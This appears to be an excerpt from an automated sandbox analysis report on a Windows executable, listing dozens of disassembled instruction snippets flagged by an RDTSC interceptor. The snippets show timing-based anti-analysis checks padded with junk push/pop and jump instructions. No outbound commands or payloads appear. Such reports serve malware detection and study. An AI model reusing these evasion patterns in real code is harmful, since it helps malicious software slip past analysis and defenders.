                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E399A1 second address: E242C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F10525BFEh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F9F10525BF8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 add ecx, dword ptr [ebp+122D1E9Ah] 0x0000002f lea eax, dword ptr [ebp+12484730h] 0x00000035 mov dword ptr [ebp+122D2811h], esi 0x0000003b push eax 0x0000003c jl 00007F9F10525C0Bh 0x00000042 mov dword ptr [esp], eax 0x00000045 or dword ptr [ebp+122D31C4h], edi 0x0000004b call dword ptr [ebp+122D3256h] 0x00000051 push ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F9F10525C08h 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E39EB0 second address: E39EC6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9F112ED79Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E39EC6 second address: E39ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3A072 second address: E3A078 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3A8CD second address: E3A8EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525C01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3AC0F second address: E3AC13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3AC13 second address: E3AC44 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a pushad 0x0000000b mov ecx, esi 0x0000000d xor eax, 290477A7h 0x00000013 popad 0x00000014 lea eax, dword ptr [ebp+12484774h] 0x0000001a add edx, dword ptr [ebp+122D3242h] 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 jg 00007F9F10525BF6h 0x0000002a jbe 00007F9F10525BF6h 0x00000030 popad 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7C453 second address: E7C459 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7C459 second address: E7C45D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7C59E second address: E7C5A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7C5A4 second address: E7C5B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 jp 00007F9F10525BF6h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7C5B6 second address: E7C5D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F9F112ED796h 0x0000000a popad 0x0000000b jne 00007F9F112ED79Ch 0x00000011 js 00007F9F112ED796h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7C5D0 second address: E7C5D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7C5D6 second address: E7C5E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c jne 00007F9F112ED796h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7C5E8 second address: E7C5F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F9F10525BF6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7C5F6 second address: E7C60E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F112ED7A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7C60E second address: E7C61F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F9F10525BF6h 0x00000009 jl 00007F9F10525BF6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E80F01 second address: E80F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jc 00007F9F112ED796h 0x0000000c popad 0x0000000d pushad 0x0000000e jns 00007F9F112ED796h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E80F17 second address: E80F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E80F1F second address: E80F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F9F112ED796h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E811F3 second address: E811F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E811F7 second address: E81203 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jns 00007F9F112ED796h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E81203 second address: E81220 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9F10525BF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F9F10525BFDh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E81220 second address: E81224 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E814DB second address: E814DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E8161C second address: E8162C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F9F112ED796h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E8162C second address: E81656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F9F10525BF6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f jmp 00007F9F10525C03h 0x00000014 jnp 00007F9F10525BFCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E80BA2 second address: E80BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E80BA6 second address: E80BAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E80BAA second address: E80BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007F9F112ED796h 0x0000000d jnl 00007F9F112ED796h 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E80BC4 second address: E80BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E80BCA second address: E80BFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F112ED79Dh 0x00000007 js 00007F9F112ED796h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 jo 00007F9F112ED7C4h 0x00000016 jmp 00007F9F112ED79Fh 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E80BFB second address: E80BFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E81BD7 second address: E81BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E81E71 second address: E81E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F9F10525C02h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E81E8C second address: E81E96 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E85079 second address: E850AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525BFBh 0x00000007 jmp 00007F9F10525C07h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jo 00007F9F10525C1Ch 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E850AA second address: E850B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F9F112ED796h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E8496D second address: E84979 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007F9F10525BF6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E84AF8 second address: E84AFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E84DC0 second address: E84DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop ecx 0x00000009 push ebx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E84DCE second address: E84DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F9F112ED796h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E87504 second address: E8753E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9F10525BFAh 0x00000008 jmp 00007F9F10525C04h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9F10525C06h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E8753E second address: E87544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E87544 second address: E8754E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9F10525BF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E870A1 second address: E870A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E870A7 second address: E870B1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9F10525BF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E870B1 second address: E870B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E870B7 second address: E870CB instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9F10525BF8h 0x00000008 pushad 0x00000009 popad 0x0000000a jnp 00007F9F10525BFEh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E870CB second address: E870E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9F112ED7A1h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E8D665 second address: E8D66C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E8CBB3 second address: E8CBBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E8CBBC second address: E8CBD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525C02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E8CBD6 second address: E8CBDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E8CF08 second address: E8CF0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E8D042 second address: E8D046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E8D046 second address: E8D051 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E8D1CC second address: E8D1E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F9F112ED7A8h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E8D1E9 second address: E8D1F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E9143F second address: E91445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E91445 second address: E9146F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9F10525BF6h 0x00000008 jg 00007F9F10525BF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 jnc 00007F9F10525BF6h 0x00000019 jmp 00007F9F10525BFFh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E91132 second address: E91157 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007F9F112ED796h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F9F112ED7A4h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E91157 second address: E91162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F9F10525BF6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E91162 second address: E91184 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9F112ED7ACh 0x00000008 jmp 00007F9F112ED7A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E9574D second address: E95756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E95756 second address: E9577B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9F112ED7B0h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E958D7 second address: E958E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E95A13 second address: E95A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E95A18 second address: E95A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jng 00007F9F10525BF6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E95E62 second address: E95E6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F9F112ED798h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3A7A4 second address: E3A7AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E9F07E second address: E9F082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E9F082 second address: E9F086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E9F086 second address: E9F08E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E9F08E second address: E9F0C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525C05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9F10525C09h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E9F0C5 second address: E9F0DB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9F112ED796h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jng 00007F9F112ED796h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E9D241 second address: E9D256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 jmp 00007F9F10525BFCh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E9D256 second address: E9D280 instructions: 0x00000000 rdtsc 0x00000002 je 00007F9F112ED7ADh 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jnp 00007F9F112ED796h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E9D64A second address: E9D650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E9DCB0 second address: E9DCC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F112ED7A5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E9E744 second address: E9E76E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pushad 0x00000007 jnc 00007F9F10525C10h 0x0000000d jmp 00007F9F10525C04h 0x00000012 jg 00007F9F10525BF6h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E9E76E second address: E9E774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E9E774 second address: E9E7B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9F10525BF6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F9F10525C09h 0x00000013 jmp 00007F9F10525C05h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EA2F49 second address: EA2F60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F112ED7A3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EA2F60 second address: EA2F6B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EA2271 second address: EA227A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EA227A second address: EA229F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9F10525C02h 0x00000008 push eax 0x00000009 jmp 00007F9F10525BFEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EA268B second address: EA2692 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EA2AB5 second address: EA2ADD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9F10525BFEh 0x00000008 jmp 00007F9F10525BFEh 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: EA2ADD second address: EA2AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
